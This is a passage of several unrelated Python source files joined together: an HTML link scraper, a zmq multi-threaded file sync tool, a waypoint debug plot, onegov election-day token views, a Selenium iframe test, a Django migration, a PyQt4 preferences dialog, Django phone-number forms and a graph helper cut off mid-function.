    class SearchParser(HTMLParser):
        "Class for parsing a html page for links"
        def __init__(self):
            #super(SearchParser, self).__init__(self)
            if badhtml:
                # htmllib's parser requires a formatter instance
                HTMLParser.__init__(self, NullFormatter())
            else:
                HTMLParser.__init__(self)
            self.urls = []  # collected href/src values, in document order
        def handle_starttag(self, *args):
            # The two bases use different callback signatures:
            # htmllib passes (tag, method, attrs); HTMLParser passes (tag, attrs).
            if badhtml:
                HTMLParser.handle_starttag(self, *args)
                tag, method, attrs = args
            else:
                tag, attrs = args
            dattrs = dict(attrs)
            if tag == 'a':
                if 'href' in dattrs:
                    url = dattrs['href']
                    self.urls.append(url)
            elif imgs and tag == 'img':
                # image sources are collected only when requested
                if 'src' in dattrs:
                    url = dattrs['src']
                    self.urls.append(url)
    return SearchParser
def usage():
    # Print command-line help (Python 2 print statements).
    print "usage: %s url [baseurl]" % sys.argv[0]
    print 'baseurl - the url to prefix relative links with'
def main():
    'entry point'
    # Parse flags by mutating sys.argv (no option parser yet, see XXX above).
    if len(sys.argv) < 2:
        usage()
        sys.exit(1)
    if '--img' in sys.argv:
        imgs = True
        sys.argv.remove('--img')
    else:
        imgs = False
    if '--not-xhtml' in sys.argv:
        # invalid xhtml
        sys.argv.remove('--not-xhtml')
        badhtml = True
    else:
        # valid XHTML
        badhtml = False
    url = sys.argv[1]
    # Absolute URLs serve as their own base; otherwise an optional second
    # positional argument supplies the prefix for relative links.
    if '://' in url:
        baseurl = url
    else:
        baseurl = ''
    if len(sys.argv) >= 3:
        baseurl = sys.argv[2]
    # Fetch the page and feed it through the chosen parser.
    searchres = urllib.urlopen(url)
    htmldata = searchres.read()
    searchres.close()
    SearchParser = getSearchParser(badhtml, imgs)
    parser = SearchParser()
    parser.feed(htmldata)
    for url in parser.urls:
        # Prefix relative links (see XXX: root-relative links are imperfect).
        if url.startswith('/') or not url.startswith('http'):
            url = baseurl + url
        print url
if __name__ == '__main__':
    main()
|
# -*- coding: utf-8 -*-
import threading
from collections import deque
import os
import zmq
import zhelpers
import zsync_utils
from zsync_network import Transceiver, Proxy
import config
import logging
import zlib
from zsync_logger import MYLOGGER, log_file_progress
class ZsyncThread(threading.Thread, Transceiver):
    """Base worker thread for file sync: `remote_sock` talks zmq to the peer,
    `inproc_sock` talks to the parent process. Subclasses implement the
    send/receive sides."""

    def __init__(self, ctx, remote_port, remote_sock,
                 inproc_sock, timeout, pipeline, chunksize, compress):
        threading.Thread.__init__(self)
        Transceiver.__init__(self)
        self.ctx = ctx                      # zmq context shared with the parent
        self.timeout = timeout              # remote-socket timeout (seconds)
        self.pipeline = pipeline            # number of in-flight chunk requests
        self.chunksize = chunksize          # bytes per file chunk
        self.compress = compress            # zlib-compress chunks when true
        self.remote_port = remote_port
        self.remote_sock = remote_sock
        self.remote = Proxy(self, remote_sock)
        self.inproc_sock = inproc_sock
        # The inproc socket's zmq IDENTITY doubles as this thread's name.
        self.identity = str(self.inproc_sock.getsockopt_string(zmq.IDENTITY))
        self.inproc = Proxy(self, inproc_sock)
        self.stoped = False                 # set by stop(); checked in run()
        self.file = zsync_utils.CommonFile()  # the file currently being synced
        self.register()
        self.add_timeout(self.remote_sock, self.timeout)
        return

    def register(self):
        # Register both sockets with the Transceiver poll loop.
        Transceiver.register(self, self.remote_sock)
        Transceiver.register(self, self.inproc_sock)
        return

    def do_stop(self, inproc, msg=''):
        # RPC handler: parent asked us to stop (optionally with a reason).
        if msg:
            MYLOGGER.debug(msg)
        self.stop()
        return

    def stop(self):
        self.stoped = True

    def log(self, msg, level=logging.INFO):
        # Forward log lines to the parent process over the inproc socket.
        self.inproc.on_child_log('thread %s: %s' % (self.identity, msg), level)
        return

    def run(self):
        """Main loop: poll both sockets, dispatch messages, and stop when the
        remote socket times out (closing any half-synced file first)."""
        self.log('%s runing' % self.__class__.__name__)
        while not self.stoped:
            polls = self.poll(1000)
            self.deal_poll(polls)
            if not self.check_timeout():
                if self.file.is_open():
                    # A transfer is in progress: abandon it and keep waiting.
                    self.sync_file_timeout()
                    self.delay_all_timeout()
                else:
                    self.stop()
        return

    def remote_msg(self, remote, msg, level=logging.DEBUG):
        # RPC handler: a log message relayed from the remote peer.
        self.log('remote: ' + msg, level)
        return

    def sync_file_timeout(self):
        # Transfer of the current file timed out; drop it.
        self.file.close()
        return
class SendThread(ZsyncThread):
    """Sending side: pops paths from a shared queue and serves file metadata
    and chunks to the receiving peer on request."""

    def __init__(self, ctx, remote_port, remote_sock,
                 inproc_sock, timeout, pipeline, chunksize,
                 src_path, file_queue, compress):
        ZsyncThread.__init__(self, ctx, remote_port,
                             remote_sock, inproc_sock, timeout, pipeline, chunksize, compress)
        self.file_queue = file_queue        # deque of paths shared between send threads
        self.src = zsync_utils.CommonPath(src_path)  # source root; paths sent relative to it
        return

    def try_send_new_file(self, client):
        """Pop the next path and announce it to the client.

        Returns True when a file was announced (or the queue is exhausted and
        the client was told we are done); False when the entry was skipped
        (symlink or stat/open error) and the caller should try the next one.
        """
        self.file.close()
        if not self.file_queue:
            client.send_over()
            self.stop()
            return True
        file_path = self.file_queue.popleft()
        if os.path.islink(file_path):
            client.remote_msg('skip link file: %s' % file_path)
            return False
        try:
            file_stat = os.stat(file_path)
            file_type = config.FILE_TYPE_DIR if os.path.isdir(file_path) \
                else config.FILE_TYPE_FILE
            if file_type == config.FILE_TYPE_FILE:
                self.file.open(file_path, 'rb')
        except Exception as e:
            self.log(str(e), logging.ERROR)
            client.remote_msg(str(e), logging.ERROR)
            return False
        file_size = file_stat.st_size
        file_mode = file_stat.st_mode
        file_time = file_stat.st_mtime
        self.file.total = file_size
        client.on_new_file(os.path.relpath(file_path, self.src.prefix_path),
                           file_type, file_mode, file_size, file_time)
        return True

    def query_new_file(self, client):
        # RPC handler: client wants the next file; skip unusable entries.
        while not self.try_send_new_file(client):
            pass
        return

    def fetch_file(self, client, offset):
        # RPC handler: client requests the chunk at byte `offset`.
        offset = int(offset)
        data = self.file.fetch(offset, self.chunksize)
        if self.compress:
            data = zlib.compress(data)
        # Raw call: chunk payloads bypass the normal message encoding.
        client.call_raw('on_fetch_file', str(offset), data)
        #self.log('send file offset %s len %s' % (offset, len(data)))
        return

    def retry_file(self, client, file_path):
        # RPC handler: client reports a failed file; requeue it and move on.
        file_path = os.path.join(self.src.prefix_path, file_path)
        self.log('sync file failed, auto put in queue again and retry: %s' % \
                 file_path, logging.ERROR)
        self.file_queue.append(file_path)
        self.query_new_file(client)
        return
class RecvThread(ZsyncThread):
    """Worker that receives files and writes them under the destination
    path, using a credit-based sliding window of chunk requests."""

    def __init__(self, ctx, remote_port, remote_sock,
            inproc_sock, timeout, pipeline, chunksize, dst_path, compress):
        ZsyncThread.__init__(self, ctx, remote_port,
            remote_sock, inproc_sock, timeout, pipeline, chunksize, compress)
        self.dst = zsync_utils.CommonPath(dst_path)
        self.ready = True
        return

    def on_new_file(self, service, file_path, file_type, file_mode, file_size, file_mtime):
        """Sender announced the next file: prepare the local target and
        start fetching, or ask for the next file when nothing to do."""
        file_path = os.path.join(self.dst.path, file_path)
        if file_type == config.FILE_TYPE_DIR:
            dir_name = file_path
            dir_mode = file_mode
            dir_time = file_mtime
        else:
            dir_name = os.path.dirname(file_path)
            dir_mode = None
            dir_time = None
        # An identical file already exists (size + mtime match): skip it.
        if zsync_utils.check_file_same(file_path, file_size, file_mtime):
            service.query_new_file()
            return
        # Replace entries of the wrong type, then ensure the directory exists.
        zsync_utils.fix_file_type(file_path, file_type)
        zsync_utils.fix_file_type(dir_name, config.FILE_TYPE_DIR)
        error = zsync_utils.makedir(dir_name, dir_mode, dir_time)
        if error:
            self.log(error, logging.ERROR)
            service.query_new_file()
            return
        if file_type == config.FILE_TYPE_DIR:
            # Directories carry no data; move on.
            service.query_new_file()
            return
        try:
            self.file.open(file_path, 'wb', file_size, self.pipeline, file_mode, file_mtime)
        except Exception as e:
            service.query_new_file()
            self.log(str(e), logging.ERROR)
            return
        if file_size == 0:
            # Empty file: creating it is enough.
            self.file.close()
            service.query_new_file()
            return
        #self.log('fetching file: %s size %s' % (file_path, file_size))
        self.sendfetch(service)
        return

    def sendfetch(self, service):
        # Issue chunk requests while credits remain and the out-of-order
        # write backlog (chunk_map) stays small.
        while self.file.credit:
            if self.file.fetch_offset >= self.file.total:
                break
            # waiting for pre chunk
            if len(self.file.chunk_map) > 10:
                break
            service.call_raw('fetch_file', str(self.file.fetch_offset))
            self.file.fetch_offset += self.chunksize
            self.file.credit -= 1
        return

    def on_fetch_file(self, service, offset, data):
        # One chunk arrived: write it, return its credit, then either
        # finish the file or request more chunks.
        # self.log('recv file offset %s len %s' % (offset, len(data)))
        if self.compress:
            data = zlib.decompress(data)
        self.file.write_chunk(int(offset), data)
        self.file.credit += 1
        if self.file.writedone:
            self.log('finish file %s' % self.file.path)
            service.query_new_file()
        else:
            self.sendfetch(service)
        return

    def sync_file_timeout(self):
        # Transfer stalled: drop the partial file and ask the sender to
        # requeue it for a retry.
        self.file.close()
        relpath = os.path.relpath(self.file.path, self.dst.path)
        self.remote.retry_file(relpath)
        return

    def send_over(self, service):
        # Sender has no more files; shut this worker down.
        self.stop()
        return

    def run(self):
        # Ensure the destination root exists, request the first file, then
        # enter the base poll loop.
        zsync_utils.fix_file_type(self.dst.path, config.FILE_TYPE_DIR)
        self.remote.query_new_file()
        ZsyncThread.run(self)
        return
class FileTransciver(Transceiver):
    """Main-thread coordinator (class name spelling kept as-is): negotiates
    with the remote end, spawns Send/Recv worker threads and relays their
    logging and transfer progress."""

    def __init__(self, ctx, args):
        Transceiver.__init__(self)
        self.args = args
        self.ctx = ctx
        self.remote_sock = None
        self.remote_ip = None
        self.remote_port = None
        self.remote = None          # proxy to the remote coordinator
        self.sender = False         # True when this side serves the files
        self.inproc_sock = None
        self.childs = []            # worker thread objects
        self.child_proxies = []     # proxies to workers over inproc sockets
        self.file_queue = deque()   # files still to send (sender side only)
        self.stoped = False
        self.sub = None             # optional subprocess waited for in stop()
        self.src = zsync_utils.CommonPath(self.args.src)
        self.dst = zsync_utils.CommonPath(self.args.dst)
        self.excludes = zsync_utils.CommonExclude(self.args.excludes)
        return

    def remote_msg(self, remote, msg, level=logging.DEBUG):
        # A log line reported by the remote coordinator.
        MYLOGGER.log(level, 'remote: ' + msg)
        return

    def log(self, level, msg):
        # Errors are mirrored to the remote side so both ends see them.
        if level >= logging.ERROR and self.remote:
            self.remote.remote_msg(msg, level)
        MYLOGGER.log(level, msg)
        return

    def on_child_log(self, child, msg, level):
        # Worker threads route their log lines through the coordinator.
        self.log(level, msg)
        return

    def do_stop(self, remote, msg='', level=logging.DEBUG):
        if msg:
            self.log(level, msg)
        self.stop()
        return

    def stop(self):
        # Idempotent shutdown: stop workers, join them, wait for any
        # subprocess, then mark this coordinator stopped.
        if self.stoped:
            return
        [child.do_stop() for child in self.child_proxies]
        [child.join() for child in self.childs]
        if self.sub:
            self.sub.wait()
        self.stoped = True
        return

    def has_child_alive(self):
        # True while at least one worker thread is still running.
        state = [child.is_alive() for child in self.childs]
        if any(state):
            return True
        return False

    def shake_hand(self, remote):
        # Handshake request from the peer: clear the timeout and answer.
        self.del_timeout(remote.sock)
        remote.on_shake_hand()
        return

    def on_shake_hand(self, remote):
        # Handshake answer received: connection established.
        self.del_timeout(remote.sock)
        return

    @staticmethod
    def put_queue(self, dpath, fnames):
        # os.path.walk callback: drop excluded names, queue the rest.
        # NOTE(review): declared @staticmethod yet takes `self`.
        # prepare_sender calls os.path.walk(..., self.put_queue, self), so
        # the instance arrives as the walk `arg` and fills `self` — this
        # works, but confirm before refactoring.
        if self.excludes:
            deln = set()
            for fname in fnames:
                if self.excludes.isExclude(os.path.relpath(dpath, self.src.prefix_path), fname):
                    deln.add(fname)
            # In-place slice assignment so os.path.walk also prunes
            # excluded sub-directories from its recursion.
            fnames[:] = set(fnames) - deln
        self.file_queue.extend([os.path.join(dpath, fname)
            for fname in fnames])
        return

    def prepare_sender(self):
        """Validate the source path and fill file_queue; False aborts."""
        if not self.src.visitValid():
            self.log(logging.ERROR, 'path not exist %s' % self.src.origin_path)
            self.remote.do_stop()
            return False
        if os.path.islink(self.src.path):
            self.log(logging.ERROR, 'path is not supported link %s' % self.src.origin_path)
            self.remote.do_stop()
            return False
        if os.path.isdir(self.src.path):
            # Python 2 API: walks the tree calling put_queue(self, dir, names).
            os.path.walk(self.src.path, self.put_queue, self)
        elif os.path.isfile(self.src.path):
            self.file_queue.append(self.src.path)
        else:
            self.log(logging.ERROR, 'path is not dir nor file %s' % self.src.origin_path)
            self.remote.do_stop()
            return False
        return True

    def set_remote_ports(self, service, ports):
        # Remote side reports which ports its workers bound; one per thread.
        # logging.debug('set_remote_ports %s, %s' % (ports, self.sender))
        if len(ports) != self.args.thread_num:
            self.log(logging.CRITICAL, 'recv ports length is not equal to thread num: \
thread_num=%s, ports=%s' % (self.args.thread_num, ports))
            service.do_stop()
            return
        self.create_childs(ports)
        return

    def create_childs(self, ports=None):
        """Spawn worker threads and wire up their sockets.

        Called with `ports` on the side that connects; without on the side
        that binds random ports and then reports them to the peer.
        """
        self.inproc, inproc_childs = zhelpers.zpipes(self.ctx, self.args.thread_num)
        child_identities = [str(inproc_child.getsockopt_string(zmq.IDENTITY)) \
            for inproc_child in inproc_childs]
        remote_socks = [zhelpers.nonblocking_socket(self.ctx, zmq.PAIR) \
            for i in xrange(self.args.thread_num)]
        if ports:
            # Peer already bound: connect one PAIR socket per worker.
            for i, sock in enumerate(remote_socks):
                sock.connect('tcp://%s:%s' % (self.remote_ip, ports[i]))
        else:
            # Bind random ports locally and tell the peer which ones.
            ports = []
            for i, sock in enumerate(remote_socks):
                port = zhelpers.bind_to_random_port(sock)
                ports.append(port)
            self.remote.set_remote_ports(ports)
        if self.sender:
            for i, sock in enumerate(remote_socks):
                self.childs.append(
                    SendThread(self.ctx, ports[i], sock,
                        inproc_childs[i], self.args.timeout, self.args.pipeline,
                        self.args.chunksize, self.src.path, self.file_queue,
                        self.args.compress)
                )
        else:
            for i, sock in enumerate(remote_socks):
                self.childs.append(
                    RecvThread(self.ctx, ports[i], sock,
                        inproc_childs[i], self.args.timeout, self.args.pipeline,
                        self.args.chunksize, self.dst.path, self.args.compress)
                )
        self.child_proxies = [Proxy(self, self.inproc, child_identities[i]) \
            for i, inproc_child in enumerate(inproc_childs)]
        self.register(self.inproc)
        [child.start() for child in self.childs]
        return

    def _prepare(self):
        # Overridden by subclasses; the base coordinator refuses to run.
        return False

    def run(self):
        """Main loop: poll, relay progress, handle Ctrl-C and timeouts, and
        exit once every worker thread has finished."""
        if not self._prepare():
            MYLOGGER.critical('prepare failed')
            return
        MYLOGGER.debug('%s runing' % self.__class__.__name__)
        while not self.stoped:
            try:
                polls = self.poll(1000)
                self.deal_poll(polls)
                # Collect per-worker transfer progress for display.
                progress = []
                for child in self.childs:
                    if child.file.file:
                        progress.append((child.file.path, child.file.offset, child.file.total))
                if progress:
                    log_file_progress(progress)
            except KeyboardInterrupt:
                self.log(logging.INFO, 'user interrupted, exit')
                self.stop()
                if self.remote:
                    self.remote.do_stop()
            if not self.check_timeout():
                MYLOGGER.info('timeout, exit')
                self.stop()
                break
            if self.childs and not self.has_child_alive():
                MYLOGGER.info('%s all thread stop, exit' % self.__class__.__name__)
                self.stop()
                break
        return
|
import math
import matplotlib.pyplot as plt
from local_pathfinding.msg import latlon
from utilities import getDesiredHeading
import numpy as np
class State:
    """Minimal planar point with Java-style accessors, used as a stand-in
    for a latlon message in this debug script."""

    def __init__(self, x, y):
        self.x, self.y = x, y

    def getX(self):
        """Return the x coordinate."""
        return self.x

    def getY(self):
        """Return the y coordinate."""
        return self.y
'''
position = latlon()
position.lat = -100
position.lon = 140
end = latlon()
end.lat = 10.3599
end.lon = -17.03663
start = latlon()
start.lat = 8.46696
start.lon = -47.03663
'''
# Hard-coded test fixture: coordinates are treated as planar (x, y) values
# rather than real lat/lon (see the commented-out latlon block above).
start = State(140, -100)
end = State(-17.2, 10.0)
position = State(100.0, -140.0)
localPath = [start, end]
def localWaypointReached(position, localPath, localPathIndex):
    """Debug/visualization routine: decide whether `position` has passed
    the local waypoint at `localPath[localPathIndex]`.

    Plots the previous waypoint, the waypoint and the boat (translated so
    the waypoint sits at the origin) together with the tangent and normal
    lines, then tests which side of the normal line the boat is on.

    NOTE(review): both branches of each comparison below return True, so
    the function returns True whenever the boat is strictly off the normal
    line, regardless of the travel direction — almost certainly a bug; the
    isStartNorth / isStartEast flags should select which inequality counts.
    """
    # latlon appears to be constructed positionally as latlon(lat, lon)
    # here — confirm against the message definition.
    position = latlon(float(position.getY()), float(position.getX()))
    previousWaypoint = latlon(float(localPath[localPathIndex - 1].getY()), float(localPath[localPathIndex - 1].getX()))
    localWaypoint = latlon(float(localPath[localPathIndex].getY()), float(localPath[localPathIndex].getX()))
    # Direction of travel from the previous waypoint to the local waypoint.
    isStartNorth = localWaypoint.lat < previousWaypoint.lat
    isStartEast = localWaypoint.lon < previousWaypoint.lon
    # Slope of the path segment and of its perpendicular (raises
    # ZeroDivisionError for vertical/horizontal segments).
    tangentSlope = (localWaypoint.lat - previousWaypoint.lat) / (localWaypoint.lon - previousWaypoint.lon)
    normalSlope = -1/tangentSlope
    # Translate everything so the local waypoint is at the origin.
    startX = previousWaypoint.lon - localWaypoint.lon
    startY = previousWaypoint.lat - localWaypoint.lat
    boatX = position.lon - localWaypoint.lon
    boatY = position.lat - localWaypoint.lat
    # --- visualization only ---
    plt.xlim(-200, 200)
    plt.ylim(-200, 200)
    plt.plot([0], [0], marker = 'o', markersize=10, color="red")            # local waypoint
    plt.plot([startX], [startY], marker="o", markersize=10, color="green")  # previous waypoint
    plt.plot([boatX], [boatY], marker = "o", markersize=10, color = "black")  # boat
    xvalues = [0, startX]
    yvalues = [0, startY]
    plt.plot(xvalues, yvalues, "-g")
    x = np.linspace(-200, 200, 100)
    y = normalSlope * x
    plt.plot(x, y, '-r')    # normal line
    y = tangentSlope * x
    plt.plot(x, y, '-b')    # tangent (path) line
    plt.show()
    # Line equations through the origin for the normal line.
    y = lambda x: normalSlope * x
    x = lambda y: y / float(normalSlope)
    print "isStartNorth", isStartNorth
    print "y(x) = ", y(boatX)
    print "boatY = ", boatY
    print "isStartEast", isStartEast
    print "x(y) = ", x(boatY)
    print "boatX = ", boatX
    if isStartNorth:
        if boatY < y(boatX):
            return True
        elif boatY > y(boatX):
            return True
    if isStartEast:
        if boatX < x(boatY):
            return True
        elif boatX > x(boatY):
            return True
    return False
print(localWaypointReached(position, localPath, 1))
|
""" The manage subscription views. """
import morepath
from onegov.election_day import _
from onegov.election_day import ElectionDayApp
from onegov.election_day.collections import UploadTokenCollection
from onegov.election_day.forms import EmptyForm
# from onegov.election_day.layouts import ManageUploadTokenItemsLayout
from onegov.election_day.layouts import ManageUploadTokensLayout
from onegov.election_day.models import UploadToken
# from uuid import uuid4
@ElectionDayApp.manage_html(
    model=UploadTokenCollection,
    template='manage/upload_tokens.pt'
)
def view_upload_tokens(self, request):
    """ Render the management list of all upload tokens. """
    layout = ManageUploadTokensLayout(self, request)
    tokens = self.query().all()
    return {
        'layout': layout,
        'title': _("Upload tokens"),
        'upload_tokens': tokens,
        'new_token': request.link(self, 'create-token'),
    }
@ElectionDayApp.manage_form(
    model=UploadTokenCollection,
    name='create-token',
    form=EmptyForm
)
def create_upload_token(self, request, form):
    """ Show a confirmation form; create a new upload token on submit. """
    layout = ManageUploadTokensLayout(self, request)

    if form.submitted(request):
        # A token needs no user input; the collection generates it.
        self.create()
        request.message(_("Upload token created."), 'success')
        return morepath.redirect(layout.manage_model_link)

    context = {
        'layout': layout,
        'form': form,
        'message': _("Create a new upload token?"),
        'button_text': _("Create"),
        'title': _("Create token"),
        'cancel': layout.manage_model_link
    }
    return context
@ElectionDayApp.manage_form(
    model=UploadToken,
    name='delete'
)
def delete_upload_token(self, request, form):
    """ Ask for confirmation, then delete the given upload token. """
    layout = ManageUploadTokensLayout(self, request)

    if form.submitted(request):
        tokens = UploadTokenCollection(request.session)
        tokens.delete(self)
        request.message(_("Upload token deleted."), 'success')
        return morepath.redirect(layout.manage_model_link)

    question = _(
        'Do you really want to delete "${item}"?',
        mapping={'item': self.token}
    )
    return {
        'message': question,
        'layout': layout,
        'form': form,
        'title': self.token,
        'subtitle': _("Delete upload token"),
        'button_text': _("Delete upload token"),
        'button_class': 'alert',
        'cancel': layout.manage_model_link
    }
|
from src.functions.Functions import Functions as Selenium
import unittest
import time
class Test_006(Selenium, unittest.TestCase):
    """End-to-end Selenium check of iframe switching on chercher.tech's
    frames demo page; element locators come from the "frames" JSON file."""

    def setUp(self):
        # Open the browser on the demo page before each test.
        Selenium.abrir_navegador(self, "http://chercher.tech/practice/frames-example-selenium-webdriver")

    def test_006(self):
        Selenium.get_json_file(self, "frames")
        # Pick an option inside Frame2, then return to the top document.
        Selenium.switch_to_iframe(self, "Frame2")
        Selenium.get_select_elements(self, "Frame2 Select").select_by_visible_text("Avatar")
        Selenium.switch_to_parentFrame(self)
        # Type into Frame1, then descend further without switching back —
        # presumably Frame3 is nested inside Frame1; confirm on the page.
        Selenium.switch_to_iframe(self, "Frame1")
        Selenium.send_key_text(self, "Frame1 input", "Big dogs")
        Selenium.switch_to_iframe(self, "Frame3")
        Selenium.get_elements(self, "Frame3 input").click()
        time.sleep(2)  # brief pause so the click result is visible

    def tearDown(self):
        Selenium.tearDown(self)
if __name__ == '__main__':
unittest.main()
|
# Generated by Django 2.0.2 on 2018-02-27 17:29
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: changes the upload path of `test.picture`."""

    dependencies = [
        ('tafaha', '0002_answer_image'),
    ]
    operations = [
        migrations.AlterField(
            model_name='test',
            name='picture',
            # NOTE(review): 'Noneimg/tafaha' looks like a path accidentally
            # built from a None value ('None' + 'img/tafaha') in the model —
            # confirm the intended upload_to before relying on it.
            field=models.ImageField(upload_to='Noneimg/tafaha'),
        ),
    ]
|
""" Class module prefDialog.py defining the PrefAutoDialog class thet builds automatically a simple Qt modal dialog for specifying application's preferences."""
# Imports
from PyQt4.QtGui import *
from PyQt4.QtCore import *
from PyQt4.uic import *
from application.lib.instrum_classes import * # DEBUGGER
#********************************************
# prefAutoDialog class
#********************************************
class PrefAutoDialog(QDialog, Debugger):
    """
    Class that builds automatically a simple Qt modal dialog for specifying application's preferences, from a preference dictionary passed to it.
    if no dictionary is passed but parent is passed and has a prefDict attribute, this prefDict is used as the preference dictionary.
    The syntax of the dictionary should be {key:keyValue,...} where keyValue ={'label':label,'type':type,...} is type dependant:
    - boolean => keyValue ={'label':'my Boolean','type':bool,'value':True} => QCheckBox widget
    - int,long,double,complex,float => keyValue ={'label':'my Int','type':int,'value':5} => QLineEdit
    - 'multipleChoice' => keyValue ={'label':'my Choices','type':'multipleChoice','choices':[1,2,3],'value':1} => QComboBox widget
    - str or anything else => keyValue ={'label':'my String','type':str,'value':'string content'} => QLineEdit widget
    """

    def __init__(self, parent=None, prefDict=None):
        self._parent = parent
        QDialog.__init__(self, self._parent)
        self.setWindowTitle("DataManager frontend preferences")
        self.setMinimumWidth(300)
        l = QGridLayout()
        self._prefDict = prefDict
        # Fall back to the parent's prefDict when none was supplied.
        if prefDict is None and parent is not None:
            if hasattr(parent, 'prefDict'):
                self._prefDict = getattr(parent, 'prefDict')
        self._widgetDict = {}   # key -> editor widget, read back in ok()
        # buid a simple representation of the preference dictionary with
        # Qwidgets
        if self._prefDict:
            for key in self._prefDict:
                dicti = self._prefDict[key]
                typ = dicti['type']
                if typ == bool:  # QCheckBox
                    widget = QCheckBox(QString(dicti['label']))
                    widget.setChecked(dicti['value'])
                    l.addWidget(widget, l.rowCount(), 0)
                elif typ == 'multipleChoice':  # QComboBox
                    widget = QComboBox()
                    widget.addItems(
                        map(lambda x: QString(str(x)), dicti['choices']))
                    # Linear scan to select the entry matching the current
                    # value (index past the end means no selection).
                    index = 0
                    while index < widget.count() and widget.itemText(index) != QString(str(dicti['value'])):
                        index += 1
                    widget.setCurrentIndex(index)
                    l.addWidget(
                        QLabel(QString(dicti['label'])), l.rowCount(), 0)
                    l.addWidget(widget, l.rowCount() - 1, 1)
                # put all other cases (int,long,double,complex,float) in
                # QLIneEdit widgets
                else:
                    widget = QLineEdit(QString(str(dicti['value'])))
                    l.addWidget(
                        QLabel(QString(dicti['label'])), l.rowCount(), 0)
                    l.addWidget(widget, l.rowCount() - 1, 1)
                self._widgetDict[key] = widget
        # end of build
        okButton = QPushButton("OK")
        cancelButton = QPushButton("Cancel")
        # Old-style PyQt4 signal/slot connections.
        self.connect(okButton, SIGNAL("clicked()"), self.ok)
        self.connect(cancelButton, SIGNAL("clicked()"), self.cancel)
        l.addWidget(cancelButton, l.rowCount(), 0)
        l.addWidget(okButton, l.rowCount() - 1, 1)
        self.setLayout(l)

    def ok(self):
        """Write the widgets' states back into the preference dictionary
        and close the dialog."""
        # modify here the preference dictionary from the widgets' states
        for key in self._widgetDict:
            widget, dicti = self._widgetDict[key], self._prefDict[key]
            typ = dicti['type']
            if typ == bool:  # QCheckBox
                dicti['value'] = widget.isChecked()
            elif typ == 'multipleChoice':  # QComboBox
                dicti['value'] = dicti['choices'][widget.currentIndex()]
            # put all other cases (int,long,double,complex,float) in QLIneEdit
            # widgets
            else:
                # Coerce the edited text back to the declared type.
                dicti['value'] = dicti['type'](widget.text())
        self.close()

    def cancel(self):
        # don't do anything and close
        self.close()
|
from django.contrib.auth.forms import UserCreationForm, UserChangeForm
from .models import CustomUser
from django import forms
class PhoneWidget(forms.MultiWidget):
    """Two-box phone input: an area/operator code box and a local-number
    box, each capped at its expected length."""

    def __init__(self, code_l, n_l, attrs=None, *args):
        sub_widgets = [
            forms.TextInput(attrs={'size': code_l, 'maxlength': code_l}),
            forms.TextInput(attrs={'size': n_l, 'maxlength': n_l}),
        ]
        super(PhoneWidget, self).__init__(sub_widgets, attrs)

    def decompress(self, value):
        """Split a stored phone value back into [code, number] parts."""
        if not value:
            return ['', '']
        return [value.code, value.number]

    def format_output(self, rendered_widgets):
        """Join the rendered sub-widgets with the fixed '+38 (...)' frame."""
        return '+38 (' + rendered_widgets[0] + ')' + rendered_widgets[1]
class PhoneField(forms.MultiValueField):
    """MultiValueField pairing two CharFields (code, number) rendered
    through PhoneWidget."""

    def __init__(self, code_l, n_l, *args):
        sub_fields = [forms.CharField(), forms.CharField()]
        phone_widget = PhoneWidget(code_l, n_l)
        super(PhoneField, self).__init__(sub_fields, widget=phone_widget, *args)

    def compress(self, values):
        """Combine [code, number] into a single '+38(code)number' string."""
        return '+38' + '(' + values[0] + ')' + values[1]
class CustomUserCreationForm(UserCreationForm):
    """
    A form that creates a user, with no privileges, from the given email and
    password.
    """
    # Phone split into a 3-digit code and 7-digit number; the '+38' prefix
    # is added by PhoneField.compress.
    phone_number = PhoneField(3, 7)

    def __init__(self, *args, **kargs):
        super(CustomUserCreationForm, self).__init__(*args, **kargs)
        # del self.fields['username']

    class Meta:
        # Password fields come from UserCreationForm itself.
        model = CustomUser
        fields = ['email', 'first_name', 'second_name', 'address', 'phone_number']
class CustomUserChangeForm(UserChangeForm):
    """A form for updating users. Includes all the fields on
    the user, but replaces the password field with admin's
    password hash display field.
    """

    def __init__(self, *args, **kargs):
        super(CustomUserChangeForm, self).__init__(*args, **kargs)
        # NOTE(review): assumes the base form still defines a 'username'
        # field; this raises KeyError otherwise.
        del self.fields['username']

    class Meta:
        model = CustomUser
        fields = "__all__"
from heapq import heapify, heappop
heapp = heapify([])
print type(heapp) |
from MAINTENANCEpack.PayMaintenance.PayOperation import PayOpe
db=PayOpe
class OpeValues:
    """Thin console-facing wrapper around PayOpe maintenance operations
    (insert/report, lookup and update)."""

    def values(self, no, pdate):
        # NOTE(review): PayOpe.show() is treated as an insert here (the
        # success message says "insert") — confirm its actual semantics.
        ope = PayOpe()
        res = ope.show(no, pdate)
        print(res)
        if res==True:
            print("insert successfully")
            # ope.selectQuery()
            # ope.selectWhere(no)
        else:
            print("Record not insert ")

    def sear(self, no):
        # Look up and return records matching `no`.
        op = PayOpe()
        oo = op.selectWhere(no)
        return oo

    def upda(self, pdate, No1):
        # NOTE(review): module-level `db = PayOpe` binds the *class*, so
        # this calls update() with `pdate` filling its first parameter —
        # verify update() is written to be called this way.
        bb = db.update(pdate, No1)
        return bb
|
import numpy as np
import random
import itertools
class graph():
    """A graph node: an id, an adjacency list, and bookkeeping fields
    (visited / color / low / index) for traversal algorithms."""

    def __init__(self, visited=False, id=None, adjacent=None, directed=False, color=-1, low=-1, index=-1):
        self.visited = visited
        self.id = id
        # `is not None` (identity check) instead of `!= None`; every node
        # gets its own fresh adjacency list when none is supplied.
        self.adjacent = adjacent if adjacent is not None else []
        self.directed = directed
        self.color = color      # node color (e.g. for coloring checks)
        self.low = low          # low-link value (presumably for SCC/articulation algorithms)
        self.index = index      # discovery index

    def add_adjacent(self, graph):
        """Link this node to `graph`; undirected nodes link back too.

        (The parameter shadows the class name; kept for compatibility
        with existing keyword callers.)
        """
        self.adjacent.append(graph)
        if not self.directed:
            graph.adjacent.append(self)

    def describe(self):
        """Print a one-line summary of this node (returns None)."""
        ads = [i.id for i in self.adjacent]
        print("ID=#{}, Visited = {}, color={} ,adjacent={}".format(self.id, self.visited, self.color, ads))
def show_graph(nodes):
    """Print a summary line for every node in `nodes`.

    Fix: the original wrote `print(n.describe())`, which printed the node
    summary and then an extra 'None' line, because describe() prints
    itself and returns None.
    """
    print("######### START GRAPH #########")
    for n in nodes:
        n.describe()
    print("######### END GRAPH #########")
def get_random_pairs(numbers, directed):
# Generate all possible non-repeating pairs
if not directed:
pairs = list(itertools.combinations(numbers, 2))
else:
